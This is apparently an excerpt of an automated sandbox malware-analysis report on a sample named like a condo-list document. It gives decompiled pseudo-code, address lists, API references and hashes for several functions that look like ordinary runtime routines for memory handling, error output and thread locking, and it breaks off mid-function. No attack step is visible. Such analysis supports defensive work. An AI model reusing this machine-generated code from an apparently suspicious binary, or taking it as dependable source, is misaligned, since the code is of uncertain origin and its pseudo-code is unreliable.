Instruction Fuzzy Hash: 2001AEE25492103DE110F7A69C85F57168C8B4472AF10467F7218F35D2C9395D44927E

Uniqueness

Uniqueness Score: -1.00%

Function 0041F0F4, Relevance: 12.1, APIs: 8, Instructions: 97
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E0041F0F4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				char* _v8;
				long _v12;
				short _v140;
				short _v2188;
				void* _t15;
				char* _t17;
				intOrPtr _t19;
				intOrPtr _t30;
				long _t48;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t61;
				void* _t64;

				_push(__ebx);
				_push(__esi);
				_v8 = 0;
				_push(_t64);
				_push(0x41f219);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t64 + 0xfffff778;
				_t61 = E0041EEFC(_t15, __ebx,  &_v2188, __edx, __edi, __esi, 0x400);
				_t17 =  *0x4ba6c0; // 0x4bb058
				if( *_t17 == 0) {
					_t19 =  *0x4ba4f8; // 0x40e710
					_t11 = _t19 + 4; // 0xffed
					LoadStringW(E00409FF0( *0x4be634),  *_t11,  &_v140, 0x40);
					MessageBoxW(0,  &_v2188,  &_v140, 0x2010);
				} else {
					_t30 =  *0x4ba524; // 0x4bb340
					E00405564(E00405820(_t30));
					_t48 = WideCharToMultiByte(1, 0,  &_v2188, _t61, 0, 0, 0, 0);
					_push(_t48);
					E00409C00();
					WideCharToMultiByte(1, 0,  &_v2188, _t61, _v8, _t48, 0, 0);
					WriteFile(GetStdHandle(0xfffffff4), _v8, _t48,  &_v12, 0);
					WriteFile(GetStdHandle(0xfffffff4), 0x41f234, 2,  &_v12, 0);
				}
				_pop(_t56);
				 *[fs:eax] = _t56;
				_push(0x41f220);
				_t57 =  *0x41f0c4; // 0x41f0c8
				return E00409D24( &_v8, _t57);
			}

0x0041f0fd
0x0041f0fe
0x0041f101
0x0041f106
0x0041f107
0x0041f10c
0x0041f10f
0x0041f122
0x0041f124
0x0041f12c
0x0041f1ca
0x0041f1cf
0x0041f1de
0x0041f1f8
0x0041f132
0x0041f132
0x0041f13c
0x0041f15a
0x0041f15c
0x0041f16b
0x0041f188
0x0041f1a0
0x0041f1ba
0x0041f1ba
0x0041f1ff
0x0041f202
0x0041f205
0x0041f20d
0x0041f218

APIs

Part of subcall function 0041EEFC: VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F0A8), ref: 0041EF2F
Part of subcall function 0041EEFC: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF53
Part of subcall function 0041EEFC: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF6E
Part of subcall function 0041EEFC: LoadStringW.USER32(00000000,0000FFEC,?,00000100), ref: 0041F009

WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,00000400,00000000,0041F219), ref: 0041F155
WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F188
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F19A
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F1A0
GetStdHandle.KERNEL32(000000F4,0041F234,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?), ref: 0041F1B4
WriteFile.KERNEL32(00000000,000000F4,0041F234,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000), ref: 0041F1BA
LoadStringW.USER32(00000000,0000FFED,?,00000040), ref: 0041F1DE
MessageBoxW.USER32(00000000,?,?,00002010), ref: 0041F1F8

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: File$ByteCharHandleLoadModuleMultiNameStringWideWrite$MessageQueryVirtual
String ID:
API String ID: 135118572-0
Opcode ID: 7bf27a680bd44ec5315003c7bd75f7b580991028cc1534cfff61cb99441fed85
Instruction ID: 441773961034998e17761d3334fa1b60ae8bad0ad03d42d5622a75f3c8f76c28
Opcode Fuzzy Hash: 7bf27a680bd44ec5315003c7bd75f7b580991028cc1534cfff61cb99441fed85
Instruction Fuzzy Hash: 7D31CF75640204BFE714E796CC42FDA77ACEB08704F9044BABA04F71D2DA786E548B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00404464, Relevance: 10.9, APIs: 7, Instructions: 406
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00404464(signed int __eax, intOrPtr __edx, void* __edi) {
				signed int __ebx;
				void* __esi;
				signed int _t69;
				signed int _t78;
				signed int _t93;
				long _t94;
				void* _t100;
				signed int _t102;
				signed int _t109;
				signed int _t115;
				signed int _t123;
				signed int _t129;
				void* _t131;
				signed int _t140;
				unsigned int _t148;
				signed int _t150;
				long _t152;
				signed int _t156;
				intOrPtr _t161;
				signed int _t166;
				signed int _t170;
				unsigned int _t171;
				intOrPtr _t174;
				intOrPtr _t192;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t205;
				unsigned int _t207;
				intOrPtr _t213;
				void* _t225;
				intOrPtr _t227;
				void* _t228;
				signed int _t230;
				void* _t232;
				signed int _t233;
				signed int _t234;
				signed int _t238;
				signed int _t241;
				void* _t243;
				intOrPtr* _t244;

				_t176 = __edx;
				_t66 = __eax;
				_t166 =  *(__eax - 4);
				_t217 = __eax;
				if((_t166 & 0x00000007) != 0) {
					__eflags = _t166 & 0x00000005;
					if((_t166 & 0x00000005) != 0) {
						_pop(_t217);
						_pop(_t145);
						__eflags = _t166 & 0x00000003;
						if((_t166 & 0x00000003) == 0) {
							_push(_t145);
							_push(__eax);
							_push(__edi);
							_push(_t225);
							_t244 = _t243 + 0xffffffe0;
							_t218 = __edx;
							_t202 = __eax;
							_t69 =  *(__eax - 4);
							_t148 = (0xfffffff0 & _t69) - 0x14;
							if(0xfffffff0 >= __edx) {
								__eflags = __edx - _t148 >> 1;
								if(__edx < _t148 >> 1) {
									_t150 = E00403EE8(__edx);
									__eflags = _t150;
									if(_t150 != 0) {
										__eflags = _t218 - 0x40a2c;
										if(_t218 > 0x40a2c) {
											_t78 = _t202 - 0x10;
											__eflags = _t78;
											 *((intOrPtr*)(_t78 + 8)) = _t218;
										}
										E00403AA4(_t202, _t218, _t150);
										E0040426C(_t202, _t202, _t225);
									}
								} else {
									_t150 = __eax;
									 *((intOrPtr*)(__eax - 0x10 + 8)) = __edx;
								}
							} else {
								if(0xfffffff0 <= __edx) {
									_t227 = __edx;
								} else {
									_t227 = 0xbadb9d;
								}
								 *_t244 = _t202 - 0x10 + (_t69 & 0xfffffff0);
								VirtualQuery( *(_t244 + 8), _t244 + 8, 0x1c);
								if( *((intOrPtr*)(_t244 + 0x14)) != 0x10000) {
									L12:
									_t150 = E00403EE8(_t227);
									__eflags = _t150;
									if(_t150 != 0) {
										__eflags = _t227 - 0x40a2c;
										if(_t227 > 0x40a2c) {
											_t93 = _t150 - 0x10;
											__eflags = _t93;
											 *((intOrPtr*)(_t93 + 8)) = _t218;
										}
										E00403A74(_t202,  *((intOrPtr*)(_t202 - 0x10 + 8)), _t150);
										E0040426C(_t202, _t202, _t227);
									}
								} else {
									 *(_t244 + 0x10) =  *(_t244 + 0x10) & 0xffff0000;
									_t94 =  *(_t244 + 0x10);
									if(_t218 - _t148 >= _t94) {
										goto L12;
									} else {
										_t152 = _t227 - _t148 + 0x00010000 - 0x00000001 & 0xffff0000;
										if(_t94 < _t152) {
											_t152 = _t94;
										}
										if(VirtualAlloc( *(_t244 + 0xc), _t152, 0x2000, 4) == 0 || VirtualAlloc( *(_t244 + 0xc), _t152, 0x1000, 4) == 0) {
											goto L12;
										} else {
											_t100 = _t202 - 0x10;
											 *((intOrPtr*)(_t100 + 8)) = _t218;
											 *(_t100 + 0xc) = _t152 +  *(_t100 + 0xc) | 0x00000008;
											_t150 = _t202;
										}
									}
								}
							}
							return _t150;
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						_t170 = _t166 & 0xfffffff0;
						_push(__edi);
						_t205 = _t170 + __eax;
						_t171 = _t170 - 4;
						_t156 = _t166 & 0x0000000f;
						__eflags = __edx - _t171;
						_push(_t225);
						if(__edx > _t171) {
							_t102 =  *(_t205 - 4);
							__eflags = _t102 & 0x00000001;
							if((_t102 & 0x00000001) == 0) {
								L75:
								asm("adc edi, 0xffffffff");
								_t228 = ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176;
								_t207 = _t171;
								_t109 = E00403EE8(((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176);
								_t192 = _t176;
								__eflags = _t109;
								if(_t109 == 0) {
									goto L73;
								} else {
									__eflags = _t228 - 0x40a2c;
									if(_t228 > 0x40a2c) {
										 *((intOrPtr*)(_t109 - 8)) = _t192;
									}
									_t230 = _t109;
									E00403A74(_t217, _t207, _t109);
									E0040426C(_t217, _t207, _t230);
									return _t230;
								}
							} else {
								_t115 = _t102 & 0xfffffff0;
								_t232 = _t171 + _t115;
								__eflags = __edx - _t232;
								if(__edx > _t232) {
									goto L75;
								} else {
									__eflags =  *0x4bb059;
									if(__eflags == 0) {
										L66:
										__eflags = _t115 - 0xb30;
										if(_t115 >= 0xb30) {
											E00403AC0(_t205);
											_t176 = _t176;
											_t171 = _t171;
										}
										asm("adc edi, 0xffffffff");
										_t123 = (_t176 + ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + 0x000000d3 & 0xffffff00) + 0x30;
										_t195 = _t232 + 4 - _t123;
										__eflags = _t195;
										if(_t195 > 0) {
											 *(_t217 + _t232 - 4) = _t195;
											 *((intOrPtr*)(_t217 - 4 + _t123)) = _t195 + 3;
											_t233 = _t123;
											__eflags = _t195 - 0xb30;
											if(_t195 >= 0xb30) {
												__eflags = _t123 + _t217;
												E00403B00(_t123 + _t217, _t171, _t195);
											}
										} else {
											 *(_t217 + _t232) =  *(_t217 + _t232) & 0xfffffff7;
											_t233 = _t232 + 4;
										}
										_t234 = _t233 | _t156;
										__eflags = _t234;
										 *(_t217 - 4) = _t234;
										 *0x4bbae8 = 0;
										_t109 = _t217;
										L73:
										return _t109;
									} else {
										while(1) {
											asm("lock cmpxchg [0x4bbae8], ah");
											if(__eflags == 0) {
												break;
											}
											asm("pause");
											__eflags =  *0x4bb989;
											if(__eflags != 0) {
												continue;
											} else {
												Sleep(0);
												_t176 = _t176;
												_t171 = _t171;
												asm("lock cmpxchg [0x4bbae8], ah");
												if(__eflags != 0) {
													Sleep(0xa);
													_t176 = _t176;
													_t171 = _t171;
													continue;
												}
											}
											break;
										}
										_t156 = 0x0000000f &  *(_t217 - 4);
										_t129 =  *(_t205 - 4);
										__eflags = _t129 & 0x00000001;
										if((_t129 & 0x00000001) == 0) {
											L74:
											 *0x4bbae8 = 0;
											goto L75;
										} else {
											_t115 = _t129 & 0xfffffff0;
											_t232 = _t171 + _t115;
											__eflags = _t176 - _t232;
											if(_t176 > _t232) {
												goto L74;
											} else {
												goto L66;
											}
										}
									}
								}
							}
						} else {
							__eflags = __edx + __edx - _t171;
							if(__edx + __edx < _t171) {
								__eflags = __edx - 0xb2c;
								if(__edx >= 0xb2c) {
									L41:
									_t32 = _t176 + 0xd3; // 0xbff
									_t238 = (_t32 & 0xffffff00) + 0x30;
									_t174 = _t171 + 4 - _t238;
									__eflags =  *0x4bb059;
									if(__eflags != 0) {
										while(1) {
											asm("lock cmpxchg [0x4bbae8], ah");
											if(__eflags == 0) {
												break;
											}
											asm("pause");
											__eflags =  *0x4bb989;
											if(__eflags != 0) {
												continue;
											} else {
												Sleep(0);
												_t174 = _t174;
												asm("lock cmpxchg [0x4bbae8], ah");
												if(__eflags != 0) {
													Sleep(0xa);
													_t174 = _t174;
													continue;
												}
											}
											break;
										}
										_t156 = 0x0000000f &  *(_t217 - 4);
										__eflags = 0xf;
									}
									 *(_t217 - 4) = _t156 | _t238;
									_t161 = _t174;
									_t196 =  *(_t205 - 4);
									__eflags = _t196 & 0x00000001;
									if((_t196 & 0x00000001) != 0) {
										_t131 = _t205;
										_t197 = _t196 & 0xfffffff0;
										_t161 = _t161 + _t197;
										_t205 = _t205 + _t197;
										__eflags = _t197 - 0xb30;
										if(_t197 >= 0xb30) {
											E00403AC0(_t131);
										}
									} else {
										 *(_t205 - 4) = _t196 | 0x00000008;
									}
									 *((intOrPtr*)(_t205 - 8)) = _t161;
									 *((intOrPtr*)(_t217 + _t238 - 4)) = _t161 + 3;
									__eflags = _t161 - 0xb30;
									if(_t161 >= 0xb30) {
										E00403B00(_t217 + _t238, _t174, _t161);
									}
									 *0x4bbae8 = 0;
									return _t217;
								} else {
									__eflags = __edx - 0x2cc;
									if(__edx < 0x2cc) {
										_t213 = __edx;
										_t140 = E00403EE8(__edx);
										__eflags = _t140;
										if(_t140 != 0) {
											_t241 = _t140;
											E00403AA4(_t217, _t213, _t140);
											E0040426C(_t217, _t213, _t241);
											_t140 = _t241;
										}
										return _t140;
									} else {
										_t176 = 0xb2c;
										__eflags = _t171 - 0xb2c;
										if(_t171 <= 0xb2c) {
											goto L37;
										} else {
											goto L41;
										}
									}
								}
							} else {
								L37:
								return _t66;
							}
						}
					}
				} else {
					__ebx =  *__ecx;
					__ecx =  *(__ebx + 2) & 0x0000ffff;
					__ecx = ( *(__ebx + 2) & 0x0000ffff) - 4;
					__eflags = __ecx - __edx;
					if(__ecx < __edx) {
						__ecx = __ecx + __ecx + 0x20;
						_push(__edi);
						__edi = __edx;
						__eax = 0;
						__ecx = __ecx - __edx;
						asm("adc eax, 0xffffffff");
						__eax = 0 & __ecx;
						__eax = (0 & __ecx) + __edx;
						__eax = E00403EE8((0 & __ecx) + __edx);
						__eflags = __eax;
						if(__eax != 0) {
							__eflags = __edi - 0x40a2c;
							if(__edi > 0x40a2c) {
								 *(__eax - 8) = __edi;
							}
							 *(__ebx + 2) & 0x0000ffff = ( *(__ebx + 2) & 0x0000ffff) - 4;
							__eflags = ( *(__ebx + 2) & 0x0000ffff) - 4;
							__edx = __eax;
							__edi = __eax;
							 *((intOrPtr*)(__ebx + 0x1c))() = E0040426C(__esi, __edi, __ebp);
							__eax = __edi;
						}
						_pop(__edi);
						_pop(__esi);
						_pop(__ebx);
						return __eax;
					} else {
						__ebx = 0x40 + __edx * 4;
						__eflags = 0x40 + __edx * 4 - __ecx;
						if(0x40 + __edx * 4 < __ecx) {
							__ebx = __edx;
							__eax = __edx;
							__eax = E00403EE8(__edx);
							__eflags = __eax;
							if(__eax != 0) {
								__ecx = __ebx;
								__edx = __eax;
								__ebx = __eax;
								__esi = E0040426C(__esi, __edi, __ebp);
								__eax = __ebx;
							}
							_pop(__esi);
							_pop(__ebx);
							return __eax;
						} else {
							_pop(__esi);
							_pop(__ebx);
							return __eax;
						}
					}
				}
			}

0x00404464
0x00404464
0x00404464
0x0040446c
0x0040446e
0x004044fc
0x004044ff
0x0040476c
0x0040476d
0x0040476e
0x00404771
0x00403d9c
0x00403d9d
0x00403d9e
0x00403d9f
0x00403da0
0x00403da3
0x00403da5
0x00403dac
0x00403db5
0x00403dba
0x00403ea1
0x00403ea3
0x00403eb6
0x00403eb8
0x00403eba
0x00403ebc
0x00403ec2
0x00403ec6
0x00403ec6
0x00403ec9
0x00403ec9
0x00403ed2
0x00403ed9
0x00403ed9
0x00403ea5
0x00403ea5
0x00403eaa
0x00403eaa
0x00403dc0
0x00403dc9
0x00403dcf
0x00403dcb
0x00403dcb
0x00403dcb
0x00403ddb
0x00403dea
0x00403df7
0x00403e67
0x00403e6e
0x00403e70
0x00403e72
0x00403e74
0x00403e7a
0x00403e7e
0x00403e7e
0x00403e81
0x00403e81
0x00403e91
0x00403e98
0x00403e98
0x00403df9
0x00403df9
0x00403e05
0x00403e0b
0x00000000
0x00403e0d
0x00403e1e
0x00403e22
0x00403e24
0x00403e24
0x00403e3a
0x00000000
0x00403e52
0x00403e54
0x00403e57
0x00403e60
0x00403e63
0x00403e63
0x00403e3a
0x00403e0b
0x00403df7
0x00403ee7
0x00404777
0x00404777
0x00404779
0x00404779
0x00404505
0x00404507
0x0040450a
0x0040450b
0x0040450e
0x00404511
0x00404514
0x00404516
0x00404517
0x0040462c
0x0040462f
0x00404631
0x00404724
0x0040472f
0x00404736
0x00404738
0x0040473b
0x00404740
0x00404741
0x00404743
0x00000000
0x00404745
0x00404745
0x0040474b
0x0040474d
0x0040474d
0x00404750
0x00404758
0x0040475f
0x0040476a
0x0040476a
0x00404637
0x00404637
0x0040463a
0x0040463d
0x0040463f
0x00000000
0x00404645
0x00404645
0x0040464c
0x004046a9
0x004046a9
0x004046ae
0x004046b4
0x004046b9
0x004046ba
0x004046ba
0x004046c6
0x004046d7
0x004046dd
0x004046dd
0x004046df
0x004046ec
0x004046f3
0x004046f7
0x004046f9
0x004046ff
0x00404701
0x00404703
0x00404703
0x004046e1
0x004046e1
0x004046e5
0x004046e5
0x00404708
0x00404708
0x0040470a
0x0040470d
0x00404714
0x00404716
0x0040471a
0x0040464e
0x0040464e
0x00404653
0x0040465b
0x00000000
0x00000000
0x0040465d
0x0040465f
0x00404666
0x00000000
0x00404668
0x0040466c
0x00404671
0x00404672
0x00404678
0x00404680
0x00404686
0x0040468b
0x0040468c
0x00000000
0x0040468c
0x00404680
0x00000000
0x00404666
0x00404695
0x00404698
0x0040469b
0x0040469d
0x0040471d
0x0040471d
0x00000000
0x0040469f
0x0040469f
0x004046a2
0x004046a5
0x004046a7
0x00000000
0x00000000
0x00000000
0x00000000
0x004046a7
0x0040469d
0x0040464c
0x0040463f
0x0040451d
0x00404520
0x00404522
0x0040452c
0x00404532
0x00404549
0x00404549
0x00404555
0x0040455b
0x0040455d
0x00404564
0x00404566
0x0040456b
0x00404573
0x00000000
0x00000000
0x00404575
0x00404577
0x0040457e
0x00000000
0x00404580
0x00404583
0x00404588
0x0040458e
0x00404596
0x0040459b
0x004045a0
0x00000000
0x004045a0
0x00404596
0x00000000
0x0040457e
0x004045a9
0x004045a9
0x004045a9
0x004045ae
0x004045b1
0x004045b3
0x004045b6
0x004045b9
0x004045c4
0x004045c6
0x004045c9
0x004045cb
0x004045cd
0x004045d3
0x004045d5
0x004045d5
0x004045bb
0x004045be
0x004045be
0x004045da
0x004045e0
0x004045e4
0x004045ea
0x004045f1
0x004045f1
0x004045f6
0x00404603
0x00404534
0x00404534
0x0040453a
0x00404604
0x00404608
0x0040460d
0x0040460f
0x00404611
0x00404619
0x00404620
0x00404625
0x00404625
0x0040462b
0x00404540
0x00404540
0x00404545
0x00404547
0x00000000
0x00000000
0x00000000
0x00000000
0x00404547
0x0040453a
0x00404524
0x00404524
0x00404528
0x00404528
0x00404522
0x00404517
0x00404474
0x00404474
0x00404476
0x0040447a
0x0040447d
0x0040447f
0x004044b8
0x004044bc
0x004044bd
0x004044bf
0x004044c1
0x004044c3
0x004044c6
0x004044c8
0x004044ca
0x004044cf
0x004044d1
0x004044d3
0x004044d9
0x004044db
0x004044db
0x004044e2
0x004044e2
0x004044e5
0x004044e7
0x004044f0
0x004044f5
0x004044f5
0x004044f7
0x004044f8
0x004044f9
0x004044fa
0x00404481
0x00404481
0x00404488
0x0040448a
0x00404490
0x00404492
0x00404494
0x00404499
0x0040449b
0x0040449d
0x0040449f
0x004044a1
0x004044ac
0x004044b1
0x004044b1
0x004044b3
0x004044b4
0x004044b5
0x0040448c
0x0040448c
0x0040448d
0x0040448e
0x0040448e
0x0040448a
0x0040447f

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec1625ffc2fe51f8c31513aba64e24c59fd6eccf0fed4d7fd9cb209259156b9f
Instruction ID: a6f3f7862a5743fd60f07ae337b35688b7a953487e66f12862dc3ba09d14b1d9
Opcode Fuzzy Hash: ec1625ffc2fe51f8c31513aba64e24c59fd6eccf0fed4d7fd9cb209259156b9f
Instruction Fuzzy Hash: 8CC115A27106000BD714AE7DDD8476AB68A9BC5716F28827FF244EB3D6DB7CCD418388

Uniqueness

Uniqueness Score: -1.00%

Function 0041F7A0, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0041F7A0(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				short _v558;
				char _v564;
				intOrPtr _v568;
				char _v572;
				char _v576;
				char _v580;
				intOrPtr _v584;
				char _v588;
				void* _v592;
				char _v596;
				char _v600;
				char _v604;
				char _v608;
				intOrPtr _v612;
				char _v616;
				char _v620;
				char _v624;
				void* _v628;
				char _v632;
				void* _t64;
				intOrPtr _t65;
				long _t76;
				intOrPtr _t82;
				intOrPtr _t103;
				intOrPtr _t107;
				intOrPtr _t110;
				intOrPtr _t112;
				intOrPtr _t115;
				intOrPtr _t127;
				void* _t136;
				intOrPtr _t138;
				void* _t141;
				void* _t143;

				_t136 = __edi;
				_t140 = _t141;
				_v632 = 0;
				_v596 = 0;
				_v604 = 0;
				_v600 = 0;
				_v8 = 0;
				_push(_t141);
				_push(0x41f9a6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t141 + 0xfffffd8c;
				_t64 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x14)) - 1;
				_t143 = _t64;
				if(_t143 < 0) {
					_t65 =  *0x4ba798; // 0x40e730
					E0040C9F0(_t65,  &_v8, _t140);
				} else {
					if(_t143 == 0) {
						_t107 =  *0x4ba670; // 0x40e738
						E0040C9F0(_t107,  &_v8, _t140);
					} else {
						if(_t64 == 7) {
							_t110 =  *0x4ba4d0; // 0x40e740
							E0040C9F0(_t110,  &_v8, _t140);
						} else {
							_t112 =  *0x4ba5c8; // 0x40e748
							E0040C9F0(_t112,  &_v8, _t140);
						}
					}
				}
				_t115 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x18));
				VirtualQuery( *( *((intOrPtr*)(_a4 - 4)) + 0xc),  &_v36, 0x1c);
				_t138 = _v36.State;
				if(_t138 == 0x1000 || _t138 == 0x10000) {
					_t76 = GetModuleFileNameW(_v36.AllocationBase,  &_v558, 0x105);
					_t147 = _t76;
					if(_t76 == 0) {
						goto L12;
					} else {
						_v592 =  *( *((intOrPtr*)(_a4 - 4)) + 0xc);
						_v588 = 5;
						E0040858C( &_v600, 0x105,  &_v558);
						E0041A418(_v600, _t115,  &_v596, _t136, _t138, _t147);
						_v584 = _v596;
						_v580 = 0x11;
						_v576 = _v8;
						_v572 = 0x11;
						_v568 = _t115;
						_v564 = 5;
						_push( &_v592);
						_t103 =  *0x4ba6e0; // 0x40e810
						E0040C9F0(_t103,  &_v604, _t140, 3);
						E0041F2A0(_t115, _v604, 1, _t136, _t138);
					}
				} else {
					L12:
					_v628 =  *( *((intOrPtr*)(_a4 - 4)) + 0xc);
					_v624 = 5;
					_v620 = _v8;
					_v616 = 0x11;
					_v612 = _t115;
					_v608 = 5;
					_push( &_v628);
					_t82 =  *0x4ba67c; // 0x40e6d8
					E0040C9F0(_t82,  &_v632, _t140, 2);
					E0041F2A0(_t115, _v632, 1, _t136, _t138);
				}
				_pop(_t127);
				 *[fs:eax] = _t127;
				_push(0x41f9ad);
				E00407A20( &_v632);
				E00407A80( &_v604, 3);
				return E00407A20( &_v8);
			}

0x0041f7a0
0x0041f7a1
0x0041f7ad
0x0041f7b3
0x0041f7b9
0x0041f7bf
0x0041f7c5
0x0041f7ca
0x0041f7cb
0x0041f7d0
0x0041f7d3
0x0041f7df
0x0041f7df
0x0041f7e2
0x0041f7f0
0x0041f7f5
0x0041f7e4
0x0041f7e4
0x0041f7ff
0x0041f804
0x0041f7e6
0x0041f7e9
0x0041f80e
0x0041f813
0x0041f7eb
0x0041f81d
0x0041f822
0x0041f822
0x0041f7e9
0x0041f7e4
0x0041f82d
0x0041f840
0x0041f845
0x0041f84e
0x0041f86c
0x0041f871
0x0041f873
0x00000000
0x0041f879
0x0041f882
0x0041f888
0x0041f8a0
0x0041f8b1
0x0041f8bc
0x0041f8c2
0x0041f8cc
0x0041f8d2
0x0041f8d9
0x0041f8df
0x0041f8ec
0x0041f8f5
0x0041f8fa
0x0041f90c
0x0041f911
0x0041f915
0x0041f915
0x0041f91e
0x0041f924
0x0041f92e
0x0041f934
0x0041f93b
0x0041f941
0x0041f94e
0x0041f957
0x0041f95c
0x0041f96e
0x0041f973
0x0041f977
0x0041f97a
0x0041f97d
0x0041f988
0x0041f998
0x0041f9a5

APIs

VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F9A6), ref: 0041F840
GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0041F9A6), ref: 0041F86C

Part of subcall function 0040C9F0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 0040CA35

Strings

@@, xrefs: 0041F80E
0@, xrefs: 0041F7F0
H@, xrefs: 0041F81D
8@, xrefs: 0041F7FF

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: FileLoadModuleNameQueryStringVirtual
String ID: 0@$8@$@@$H@
API String ID: 902310565-4161625419
Opcode ID: 2bcb5d97eafe9ae16bdb5e5d20f221eb3d58e794d65a866e62d276be447e8c2a
Instruction ID: bbc3c026f35d1d6bea3ad9012fddeafd4c483e803022796d8e8ef386e34d3195
Opcode Fuzzy Hash: 2bcb5d97eafe9ae16bdb5e5d20f221eb3d58e794d65a866e62d276be447e8c2a
Instruction Fuzzy Hash: 69511874A04258DFCB10EF69CC89BCDB7F4AB48304F0042E6A808A7351D778AE85CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00406688, Relevance: 10.6, APIs: 7, Instructions: 130
threadCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00406688(signed char* __eax, void* __edx, void* __eflags) {
				void* _t49;
				signed char _t56;
				intOrPtr _t57;
				signed char _t59;
				void* _t70;
				signed char* _t71;
				intOrPtr _t72;
				signed char* _t73;

				_t70 = __edx;
				_t71 = __eax;
				_t72 =  *((intOrPtr*)(__eax + 0x10));
				while(1) {
					L1:
					 *_t73 = E00406B30(_t71);
					if( *_t73 != 0 || _t70 == 0) {
						break;
					}
					_t73[1] = 0;
					if(_t72 <= 0) {
						while(1) {
							L17:
							_t56 =  *_t71;
							if(_t56 == 0) {
								goto L1;
							}
							asm("lock cmpxchg [esi], edx");
							if(_t56 != _t56) {
								continue;
							} else {
								goto L19;
							}
							do {
								L19:
								_t73[4] = GetTickCount();
								E0040688C(_t71);
								_t57 =  *0x4bb8f8; // 0x4b9284
								 *((intOrPtr*)(_t57 + 0x10))();
								 *_t73 = 0 == 0;
								if(_t70 != 0xffffffff) {
									_t73[8] = GetTickCount();
									if(_t70 <= _t73[8] - _t73[4]) {
										_t70 = 0;
									} else {
										_t70 = _t70 - _t73[8] - _t73[4];
									}
								}
								if( *_t73 == 0) {
									do {
										asm("lock cmpxchg [esi], edx");
									} while ( *_t71 !=  *_t71);
									_t73[1] = 1;
								} else {
									while(1) {
										_t59 =  *_t71;
										if((_t59 & 0x00000001) != 0) {
											goto L29;
										}
										asm("lock cmpxchg [esi], edx");
										if(_t59 != _t59) {
											continue;
										}
										_t73[1] = 1;
										goto L29;
									}
								}
								L29:
							} while (_t73[1] == 0);
							if( *_t73 != 0) {
								_t71[8] = GetCurrentThreadId();
								_t71[4] = 1;
							}
							goto L32;
						}
						continue;
					}
					_t73[4] = GetTickCount();
					_t73[0xc] = 0;
					if(_t72 <= 0) {
						L13:
						if(_t70 == 0xffffffff) {
							goto L17;
						}
						_t73[8] = GetTickCount();
						_t49 = _t73[8] - _t73[4];
						if(_t70 > _t49) {
							_t70 = _t70 - _t49;
							goto L17;
						}
						 *_t73 = 0;
						break;
					}
					L5:
					L5:
					if(_t70 == 0xffffffff || _t70 > GetTickCount() - _t73[4]) {
						goto L8;
					} else {
						 *_t73 = 0;
					}
					break;
					L8:
					if( *_t71 > 1) {
						goto L13;
